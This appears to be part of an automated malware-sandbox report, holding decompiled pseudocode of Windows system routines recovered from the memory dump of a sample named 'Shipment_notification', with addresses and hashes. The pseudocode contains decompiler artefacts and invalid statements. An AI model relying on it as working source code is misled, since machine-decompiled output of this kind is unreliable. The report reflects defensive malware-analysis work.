                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E01B1513A(intOrPtr __ecx, void* __edx) {
                                                                                				signed int _v8;
                                                                                				signed char _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				signed int _v32;
                                                                                				signed int _v36;
                                                                                				signed int _v40;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr _v48;
                                                                                				char _v63;
                                                                                				char _v64;
                                                                                				signed int _v72;
                                                                                				signed int _v76;
                                                                                				signed int _v80;
                                                                                				signed int _v84;
                                                                                				signed int _v88;
                                                                                				signed char* _v92;
                                                                                				signed int _v100;
                                                                                				signed int _v104;
                                                                                				char _v105;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t157;
                                                                                				signed int _t159;
                                                                                				signed int _t160;
                                                                                				unsigned int* _t161;
                                                                                				intOrPtr _t165;
                                                                                				signed int _t172;
                                                                                				signed char* _t181;
                                                                                				intOrPtr _t189;
                                                                                				intOrPtr* _t200;
                                                                                				signed int _t202;
                                                                                				signed int _t203;
                                                                                				char _t204;
                                                                                				signed int _t207;
                                                                                				signed int _t208;
                                                                                				void* _t209;
                                                                                				intOrPtr _t210;
                                                                                				signed int _t212;
                                                                                				signed int _t214;
                                                                                				signed int _t221;
                                                                                				signed int _t222;
                                                                                				signed int _t226;
                                                                                				intOrPtr* _t232;
                                                                                				signed int _t233;
                                                                                				signed int _t234;
                                                                                				intOrPtr _t237;
                                                                                				intOrPtr _t238;
                                                                                				intOrPtr _t240;
                                                                                				void* _t245;
                                                                                				signed int _t246;
                                                                                				signed int _t247;
                                                                                				void* _t248;
                                                                                				void* _t251;
                                                                                				void* _t252;
                                                                                				signed int _t253;
                                                                                				signed int _t255;
                                                                                				signed int _t256;
                                                                                
                                                                                				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                                				_v8 =  *0x1bdd360 ^ _t255;
                                                                                				_v32 = _v32 & 0x00000000;
                                                                                				_t251 = __edx;
                                                                                				_t237 = __ecx;
                                                                                				_t212 = 6;
                                                                                				_t245 =  &_v84;
                                                                                				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                                				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                				_v48 = __ecx;
                                                                                				_v36 = _t207;
                                                                                				_t157 = memset(_t245, 0, _t212 << 2);
                                                                                				_t256 = _t255 + 0xc;
                                                                                				_t246 = _t245 + _t212;
                                                                                				if(_t207 == 2) {
                                                                                					_t247 =  *(_t237 + 0x60);
                                                                                					_t208 =  *(_t237 + 0x64);
                                                                                					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                                					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                                					_v104 = _t159;
                                                                                					_v76 = _t159;
                                                                                					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                                					_v100 = _t160;
                                                                                					_v72 = _t160;
                                                                                					L19:
                                                                                					_v80 = _t208;
                                                                                					_v84 = _t247;
                                                                                					L8:
                                                                                					_t214 = 0;
                                                                                					if( *(_t237 + 0x74) > 0) {
                                                                                						_t82 = _t237 + 0x84; // 0x124
                                                                                						_t161 = _t82;
                                                                                						_v92 = _t161;
                                                                                						while( *_t161 >> 0x1f != 0) {
                                                                                							_t200 = _v92;
                                                                                							if( *_t200 == 0x80000000) {
                                                                                								break;
                                                                                							}
                                                                                							_t214 = _t214 + 1;
                                                                                							_t161 = _t200 + 0x10;
                                                                                							_v92 = _t161;
                                                                                							if(_t214 <  *(_t237 + 0x74)) {
                                                                                								continue;
                                                                                							}
                                                                                							goto L9;
                                                                                						}
                                                                                						_v88 = _t214 << 4;
                                                                                						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                                						_t165 = 0;
                                                                                						asm("adc eax, [ecx+edx+0x7c]");
                                                                                						_v24 = _t165;
                                                                                						_v28 = _v40;
                                                                                						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                                						_t221 = _v40;
                                                                                						_v16 =  *_v92;
                                                                                						_v32 =  &_v28;
                                                                                						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                                							goto L9;
                                                                                						}
                                                                                						_t240 = _v48;
                                                                                						if( *_v92 != 0x80000000) {
                                                                                							goto L9;
                                                                                						}
                                                                                						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                                                						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                                                						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                                                						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                                                						_t226 = 0;
                                                                                						_t181 = _t251 + 0x66;
                                                                                						_v88 = 0;
                                                                                						_v92 = _t181;
                                                                                						do {
                                                                                							if( *((char*)(_t181 - 2)) == 0) {
                                                                                								goto L31;
                                                                                							}
                                                                                							_t226 = _v88;
                                                                                							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                                                								_t181 = E01B2D0F0(1, _t226 + 0x20, 0);
                                                                                								_t226 = _v40;
                                                                                								 *(_t226 + 8) = _t181;
                                                                                								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                                                								L34:
                                                                                								if(_v44 == 0) {
                                                                                									goto L9;
                                                                                								}
                                                                                								_t210 = _v44;
                                                                                								_t127 = _t210 + 0x1c; // 0x1c
                                                                                								_t249 = _t127;
                                                                                								E01B02280(_t181, _t127);
                                                                                								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                                                								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                                                									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                                                								}
                                                                                								_t189 = L01B04620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                                                								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                                                								if(_t189 != 0) {
                                                                                									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                                                									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                                                									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                									 *_t232 = _t232 + 0x10;
                                                                                									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                                									E01B2F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                                                									_t256 = _t256 + 0xc;
                                                                                								}
                                                                                								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                                                								E01AFFFB0(_t210, _t249, _t249);
                                                                                								_t222 = _v76;
                                                                                								_t172 = _v80;
                                                                                								_t208 = _v84;
                                                                                								_t247 = _v88;
                                                                                								L10:
                                                                                								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                                                								_v44 = _t238;
                                                                                								if(_t238 != 0) {
                                                                                									 *0x1bdb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                                                									_v44();
                                                                                								}
                                                                                								_pop(_t248);
                                                                                								_pop(_t252);
                                                                                								_pop(_t209);
                                                                                								return L01B2B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                                                							}
                                                                                							_t181 = _v92;
                                                                                							L31:
                                                                                							_t226 = _t226 + 1;
                                                                                							_t181 =  &(_t181[0x18]);
                                                                                							_v88 = _t226;
                                                                                							_v92 = _t181;
                                                                                						} while (_t226 < 4);
                                                                                						goto L34;
                                                                                					}
                                                                                					L9:
                                                                                					_t172 = _v104;
                                                                                					_t222 = _v100;
                                                                                					goto L10;
                                                                                				}
                                                                                				_t247 = _t246 | 0xffffffff;
                                                                                				_t208 = _t247;
                                                                                				_v84 = _t247;
                                                                                				_v80 = _t208;
                                                                                				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                                                					_t233 = _v72;
                                                                                					_v105 = _v64;
                                                                                					_t202 = _v76;
                                                                                				} else {
                                                                                					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                                                					_v105 = 1;
                                                                                					if(_v63 <= _t204) {
                                                                                						_v63 = _t204;
                                                                                					}
                                                                                					_t202 = _v76 |  *(_t251 + 0x40);
                                                                                					_t233 = _v72 |  *(_t251 + 0x44);
                                                                                					_t247 =  *(_t251 + 0x38);
                                                                                					_t208 =  *(_t251 + 0x3c);
                                                                                					_v76 = _t202;
                                                                                					_v72 = _t233;
                                                                                					_v84 = _t247;
                                                                                					_v80 = _t208;
                                                                                				}
                                                                                				_v104 = _t202;
                                                                                				_v100 = _t233;
                                                                                				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                                                					_t237 = _v48;
                                                                                					_v105 = 1;
                                                                                					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                                                						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                                                						_t237 = _v48;
                                                                                					}
                                                                                					_t203 = _t202 |  *(_t251 + 0xb8);
                                                                                					_t234 = _t233 |  *(_t251 + 0xbc);
                                                                                					_t247 = _t247 &  *(_t251 + 0xb0);
                                                                                					_t208 = _t208 &  *(_t251 + 0xb4);
                                                                                					_v104 = _t203;
                                                                                					_v76 = _t203;
                                                                                					_v100 = _t234;
                                                                                					_v72 = _t234;
                                                                                					_v84 = _t247;
                                                                                					_v80 = _t208;
                                                                                				}
                                                                                				if(_v105 == 0) {
                                                                                					_v36 = _v36 & 0x00000000;
                                                                                					_t208 = 0;
                                                                                					_t247 = 0;
                                                                                					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                                					goto L19;
                                                                                				} else {
                                                                                					_v36 = 1;
                                                                                					goto L8;
                                                                                				}
                                                                                 			}
                                                                                0x01b56fb6
                                                                                0x01b56fbf
                                                                                0x01b56fc1
                                                                                0x01b56fd5
                                                                                0x01b56fda
                                                                                0x01b56fda
                                                                                0x01b56fdd
                                                                                0x01b56fe2
                                                                                0x01b56fe7
                                                                                0x01b56feb
                                                                                0x01b56fef
                                                                                0x01b56ff3
                                                                                0x01b1520c
                                                                                0x01b1520c
                                                                                0x01b1520f
                                                                                0x01b15215
                                                                                0x01b15234
                                                                                0x01b1523a
                                                                                0x01b1523a
                                                                                0x01b15244
                                                                                0x01b15245
                                                                                0x01b15246
                                                                                0x01b15251
                                                                                0x01b15251
                                                                                0x01b56f13
                                                                                0x01b56f17
                                                                                0x01b56f17
                                                                                0x01b56f18
                                                                                0x01b56f1b
                                                                                0x01b56f1f
                                                                                0x01b56f23
                                                                                0x00000000
                                                                                0x01b56f28
                                                                                0x01b15204
                                                                                0x01b15204
                                                                                0x01b15208
                                                                                0x00000000
                                                                                0x01b15208
                                                                                0x01b15185
                                                                                0x01b15188
                                                                                0x01b1518a
                                                                                0x01b1518e
                                                                                0x01b15195
                                                                                0x01b56db1
                                                                                0x01b56db5
                                                                                0x01b56db9
                                                                                0x01b1519b
                                                                                0x01b1519b
                                                                                0x01b1519e
                                                                                0x01b151a7
                                                                                0x01b151a9
                                                                                0x01b151a9
                                                                                0x01b151b5
                                                                                0x01b151b8
                                                                                0x01b151bb
                                                                                0x01b151be
                                                                                0x01b151c1
                                                                                0x01b151c5
                                                                                0x01b151c9
                                                                                0x01b151cd
                                                                                0x01b151cd
                                                                                0x01b151d8
                                                                                0x01b151dc
                                                                                0x01b151e0
                                                                                0x01b56dcc
                                                                                0x01b56dd0
                                                                                0x01b56dd5
                                                                                0x01b56ddd
                                                                                0x01b56de1
                                                                                0x01b56de1
                                                                                0x01b56de5
                                                                                0x01b56deb
                                                                                0x01b56df1
                                                                                0x01b56df7
                                                                                0x01b56dfd
                                                                                0x01b56e01
                                                                                0x01b56e05
                                                                                0x01b56e09
                                                                                0x01b56e0d
                                                                                0x01b56e11
                                                                                0x01b56e11
                                                                                0x01b151eb
                                                                                0x01b56e1a
                                                                                0x01b56e1f
                                                                                0x01b56e21
                                                                                0x01b56e23
                                                                                0x00000000
                                                                                0x01b151f1
                                                                                0x01b151f1
                                                                                0x00000000
                                                                                0x01b151f1

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 180cdcc15b7dcfe14b29e39cea21ba461af1a74e77a42631cbedc52d6d785c0c
                                                                                • Instruction ID: 8460b24e9c44464471fb378fec61d40b9baa05f8ab2d3c6e57be6615a2da881b
                                                                                • Opcode Fuzzy Hash: 180cdcc15b7dcfe14b29e39cea21ba461af1a74e77a42631cbedc52d6d785c0c
                                                                                • Instruction Fuzzy Hash: DAC131755093818FD369CF28C480A5AFBE1FF89304F544AAEF9998B352D730E845CB82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E01B103E2(signed int __ecx, signed int __edx) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				signed int _v24;
                                                                                				signed int _v28;
                                                                                				signed int _v32;
                                                                                				signed int _v36;
                                                                                				intOrPtr _v40;
                                                                                				signed int _v44;
                                                                                				signed int _v48;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				char _v64;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t56;
                                                                                				signed int _t58;
                                                                                				char* _t64;
                                                                                				intOrPtr _t65;
                                                                                				signed int _t74;
                                                                                				signed int _t79;
                                                                                				char* _t83;
                                                                                				intOrPtr _t84;
                                                                                				signed int _t93;
                                                                                				signed int _t94;
                                                                                				signed char* _t95;
                                                                                				signed int _t99;
                                                                                				signed int _t100;
                                                                                				signed char* _t101;
                                                                                				signed int _t105;
                                                                                				signed int _t119;
                                                                                				signed int _t120;
                                                                                				void* _t122;
                                                                                				signed int _t123;
                                                                                				signed int _t127;
                                                                                
                                                                                				_v8 =  *0x1bdd360 ^ _t127;
                                                                                				_t119 = __ecx;
                                                                                				_t105 = __edx;
                                                                                				_t118 = 0;
                                                                                				_v20 = __edx;
                                                                                				_t120 =  *(__ecx + 0x20);
                                                                                				if(E01B10548(__ecx, 0) != 0) {
                                                                                					_t56 = 0xc000022d;
                                                                                					L23:
                                                                                					return L01B2B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                                				} else {
                                                                                					_v12 = _v12 | 0xffffffff;
                                                                                					_t58 = _t120 + 0x24;
                                                                                					_t109 =  *(_t120 + 0x18);
                                                                                					_t118 = _t58;
                                                                                					_v16 = _t58;
                                                                                					E01AFB02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                                					_v52 = 0x18;
                                                                                					_v48 = 0;
                                                                                					0x840 = 0x40;
                                                                                					if( *0x1bd7c1c != 0) {
                                                                                					}
                                                                                					_v40 = 0x840;
                                                                                					_v44 = _t105;
                                                                                					_v36 = 0;
                                                                                					_v32 = 0;
                                                                                					if(E01B07D50() != 0) {
                                                                                						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                					} else {
                                                                                						_t64 = 0x7ffe0384;
                                                                                					}
                                                                                					if( *_t64 != 0) {
                                                                                						_t65 =  *[fs:0x30];
                                                                                						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                                						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                                							_t100 = E01B07D50();
                                                                                							__eflags = _t100;
                                                                                							if(_t100 == 0) {
                                                                                								_t101 = 0x7ffe0385;
                                                                                							} else {
                                                                                								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                							}
                                                                                							__eflags =  *_t101 & 0x00000020;
                                                                                							if(( *_t101 & 0x00000020) != 0) {
                                                                                								_t118 = _t118 | 0xffffffff;
                                                                                								_t109 = 0x1485;
                                                                                								E01B67016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t105 = 0;
                                                                                					while(1) {
                                                                                						_push(0x60);
                                                                                						_push(5);
                                                                                						_push( &_v64);
                                                                                						_push( &_v52);
                                                                                						_push(0x100021);
                                                                                						_push( &_v12);
                                                                                						_t122 = E01B29830();
                                                                                						if(_t122 >= 0) {
                                                                                							break;
                                                                                						}
                                                                                						__eflags = _t122 - 0xc0000034;
                                                                                						if(_t122 == 0xc0000034) {
                                                                                							L38:
                                                                                							_t120 = 0xc0000135;
                                                                                							break;
                                                                                						}
                                                                                						__eflags = _t122 - 0xc000003a;
                                                                                						if(_t122 == 0xc000003a) {
                                                                                							goto L38;
                                                                                						}
                                                                                						__eflags = _t122 - 0xc0000022;
                                                                                						if(_t122 != 0xc0000022) {
                                                                                							break;
                                                                                						}
                                                                                						__eflags = _t105;
                                                                                						if(__eflags != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t109 = _t119;
                                                                                						_t99 = E01B669A6(_t119, __eflags);
                                                                                						__eflags = _t99;
                                                                                						if(_t99 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t105 = _t105 + 1;
                                                                                					}
                                                                                					if( !_t120 >= 0) {
                                                                                						L22:
                                                                                						_t56 = _t120;
                                                                                						goto L23;
                                                                                					}
                                                                                					if( *0x1bd7c04 != 0) {
                                                                                						_t118 = _v12;
                                                                                						_t120 = E01B6A7AC(_t119, _t118, _t109);
                                                                                						__eflags = _t120;
                                                                                						if(_t120 >= 0) {
                                                                                							goto L10;
                                                                                						}
                                                                                						__eflags =  *0x1bd7bd8;
                                                                                						if( *0x1bd7bd8 != 0) {
                                                                                							L20:
                                                                                							if(_v12 != 0xffffffff) {
                                                                                								_push(_v12);
                                                                                								E01B295D0();
                                                                                							}
                                                                                							goto L22;
                                                                                						}
                                                                                					}
                                                                                					L10:
                                                                                					_push(_v12);
                                                                                					_t105 = _t119 + 0xc;
                                                                                					_push(0x1000000);
                                                                                					_push(0x10);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(0xf);
                                                                                					_push(_t105);
                                                                                					_t120 = E01B299A0();
                                                                                					if(_t120 < 0) {
                                                                                						__eflags = _t120 - 0xc000047e;
                                                                                						if(_t120 == 0xc000047e) {
                                                                                							L51:
                                                                                							_t74 = E01B63540(_t120);
                                                                                							_t119 = _v16;
                                                                                							_t120 = _t74;
                                                                                							L52:
                                                                                							_t118 = 0x1485;
                                                                                							E01AEB1E1(_t120, 0x1485, 0, _t119);
                                                                                							goto L20;
                                                                                						}
                                                                                						__eflags = _t120 - 0xc000047f;
                                                                                						if(_t120 == 0xc000047f) {
                                                                                							goto L51;
                                                                                						}
                                                                                						__eflags = _t120 - 0xc0000462;
                                                                                						if(_t120 == 0xc0000462) {
                                                                                							goto L51;
                                                                                						}
                                                                                						_t119 = _v16;
                                                                                						__eflags = _t120 - 0xc0000017;
                                                                                						if(_t120 != 0xc0000017) {
                                                                                							__eflags = _t120 - 0xc000009a;
                                                                                							if(_t120 != 0xc000009a) {
                                                                                								__eflags = _t120 - 0xc000012d;
                                                                                								if(_t120 != 0xc000012d) {
                                                                                									_v28 = _t119;
                                                                                									_push( &_v56);
                                                                                									_push(1);
                                                                                									_v24 = _t120;
                                                                                									_push( &_v28);
                                                                                									_push(1);
                                                                                									_push(2);
                                                                                									_push(0xc000007b);
                                                                                									_t79 = E01B2AAF0();
                                                                                									__eflags = _t79;
                                                                                									if(_t79 >= 0) {
                                                                                										__eflags =  *0x1bd8474 - 3;
                                                                                										if( *0x1bd8474 != 3) {
                                                                                											 *0x1bd79dc =  *0x1bd79dc + 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L52;
                                                                                					}
                                                                                					if(E01B07D50() != 0) {
                                                                                						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                					} else {
                                                                                						_t83 = 0x7ffe0384;
                                                                                					}
                                                                                					if( *_t83 != 0) {
                                                                                						_t84 =  *[fs:0x30];
                                                                                						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                                						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                                							_t94 = E01B07D50();
                                                                                							__eflags = _t94;
                                                                                							if(_t94 == 0) {
                                                                                								_t95 = 0x7ffe0385;
                                                                                							} else {
                                                                                								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                							}
                                                                                							__eflags =  *_t95 & 0x00000020;
                                                                                							if(( *_t95 & 0x00000020) != 0) {
                                                                                								E01B67016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                                						if( *0x1bd8708 != 0) {
                                                                                							_t118 =  *0x7ffe0330;
                                                                                							_t123 =  *0x1bd7b00; // 0x0
                                                                                							asm("ror esi, cl");
                                                                                							 *0x1bdb1e0(_v12, _v20, 0x20);
                                                                                							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                                							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                                							asm("sbb esi, esi");
                                                                                							_t120 =  ~_t50 & _t93;
                                                                                						} else {
                                                                                							_t120 = 0;
                                                                                						}
                                                                                					}
                                                                                					if( !_t120 >= 0) {
                                                                                						L19:
                                                                                						_push( *_t105);
                                                                                						E01B295D0();
                                                                                						 *_t105 =  *_t105 & 0x00000000;
                                                                                						goto L20;
                                                                                					}
                                                                                					_t120 = E01AF7F65(_t119);
                                                                                					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                                						__eflags = _t120;
                                                                                						if(_t120 < 0) {
                                                                                							goto L19;
                                                                                						}
                                                                                						 *(_t119 + 0x64) = _v12;
                                                                                						goto L22;
                                                                                					}
                                                                                					goto L19;
                                                                                				}
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5fa689b2a5397d77ae50895ea272963f4d4bf8ed0518ebff8fbf49baa691e1f5
                                                                                • Instruction ID: 3030c77ddf190c33bd4229573508cfd6d81b79056ecd5fb000d82d2d8aaf9839
                                                                                • Opcode Fuzzy Hash: 5fa689b2a5397d77ae50895ea272963f4d4bf8ed0518ebff8fbf49baa691e1f5
                                                                                • Instruction Fuzzy Hash: DA91F831E002159BEF2DAB6CC884BAD7BB4EB05714F0602E5FE11AB2D5EB749D80C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E01B66DC9(signed int __ecx, void* __edx) {
                                                                                				unsigned int _v8;
                                                                                				intOrPtr _v12;
                                                                                				signed int _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				char _v32;
                                                                                				char _v36;
                                                                                				char _v40;
                                                                                				char _v44;
                                                                                				char _v48;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				char _v60;
                                                                                				void* _t87;
                                                                                				void* _t95;
                                                                                				signed char* _t96;
                                                                                				signed int _t107;
                                                                                				signed int _t136;
                                                                                				signed char* _t137;
                                                                                				void* _t157;
                                                                                				void* _t161;
                                                                                				void* _t167;
                                                                                				intOrPtr _t168;
                                                                                				void* _t174;
                                                                                				void* _t175;
                                                                                				signed int _t176;
                                                                                				void* _t177;
                                                                                
                                                                                				_t136 = __ecx;
                                                                                				_v44 = 0;
                                                                                				_t167 = __edx;
                                                                                				_v40 = 0;
                                                                                				_v36 = 0;
                                                                                				_v32 = 0;
                                                                                				_v60 = 0;
                                                                                				_v56 = 0;
                                                                                				_v52 = 0;
                                                                                				_v48 = 0;
                                                                                				_v16 = __ecx;
                                                                                				_t87 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                                                				_t175 = _t87;
                                                                                				if(_t175 != 0) {
                                                                                					_t11 = _t175 + 0x30; // 0x30
                                                                                					 *((short*)(_t175 + 6)) = 0x14d4;
                                                                                					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                                                					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                                                					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                                                					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                                                					E01B66B4C(_t167, _t11, 0x214,  &_v8);
                                                                                					_v12 = _v8 + 0x10;
                                                                                					_t95 = E01B07D50();
                                                                                					_t137 = 0x7ffe0384;
                                                                                					if(_t95 == 0) {
                                                                                						_t96 = 0x7ffe0384;
                                                                                					} else {
                                                                                						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                					}
                                                                                					_push(_t175);
                                                                                					_push(_v12);
                                                                                					_push(0x402);
                                                                                					_push( *_t96 & 0x000000ff);
                                                                                					E01B29AE0();
                                                                                					_t87 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                                                					_t176 = _v16;
                                                                                					if((_t176 & 0x00000100) != 0) {
                                                                                						_push( &_v36);
                                                                                						_t157 = 4;
                                                                                						_t87 = E01B6795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                                                						if(_t87 >= 0) {
                                                                                							_v24 = E01B6795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                                                							_v28 = E01B6795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                                                							_push( &_v52);
                                                                                							_t161 = 5;
                                                                                							_t168 = E01B6795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                                                							_v20 = _t168;
                                                                                							_t107 = L01B04620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                                                							_v16 = _t107;
                                                                                							if(_t107 != 0) {
                                                                                								_v8 = _v8 & 0x00000000;
                                                                                								 *(_t107 + 0x20) = _t176;
                                                                                								 *((short*)(_t107 + 6)) = 0x14d5;
                                                                                								_t47 = _t107 + 0x24; // 0x24
                                                                                								_t177 = _t47;
                                                                                								E01B66B4C( &_v36, _t177, 0xc78,  &_v8);
                                                                                								_t51 = _v8 + 4; // 0x4
                                                                                								_t178 = _t177 + (_v8 >> 1) * 2;
                                                                                								_v12 = _t51;
                                                                                								E01B66B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                								_v12 = _v12 + _v8;
                                                                                								E01B66B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                								_t125 = _v8;
                                                                                								_v12 = _v12 + _v8;
                                                                                								E01B66B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                                                								_t174 = _v12 + _v8;
                                                                                								if(E01B07D50() != 0) {
                                                                                									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                								}
                                                                                								_push(_v16);
                                                                                								_push(_t174);
                                                                                								_push(0x402);
                                                                                								_push( *_t137 & 0x000000ff);
                                                                                								E01B29AE0();
                                                                                								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                                                								_t168 = _v20;
                                                                                							}
                                                                                							_t87 = L01B02400( &_v36);
                                                                                							if(_v24 >= 0) {
                                                                                								_t87 = L01B02400( &_v44);
                                                                                							}
                                                                                							if(_t168 >= 0) {
                                                                                								_t87 = L01B02400( &_v52);
                                                                                							}
                                                                                							if(_v28 >= 0) {
                                                                                								return L01B02400( &_v60);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t87;
                                                                                			}
































                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 39%
                                                                                			E01B7B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                                				char _v8;
                                                                                				signed int _v12;
                                                                                				signed int _t80;
                                                                                				signed int _t83;
                                                                                				intOrPtr _t89;
                                                                                				signed int _t92;
                                                                                				signed char _t106;
                                                                                				signed int* _t107;
                                                                                				intOrPtr _t108;
                                                                                				intOrPtr _t109;
                                                                                				signed int _t114;
                                                                                				void* _t115;
                                                                                				void* _t117;
                                                                                				void* _t119;
                                                                                				void* _t122;
                                                                                				signed int _t123;
                                                                                				signed int* _t124;
                                                                                
                                                                                				_t106 = _a12;
                                                                                				if((_t106 & 0xfffffffc) != 0) {
                                                                                					return 0xc000000d;
                                                                                				}
                                                                                				if((_t106 & 0x00000002) != 0) {
                                                                                					_t106 = _t106 | 0x00000001;
                                                                                				}
                                                                                				_t109 =  *0x1bd7b9c; // 0x0
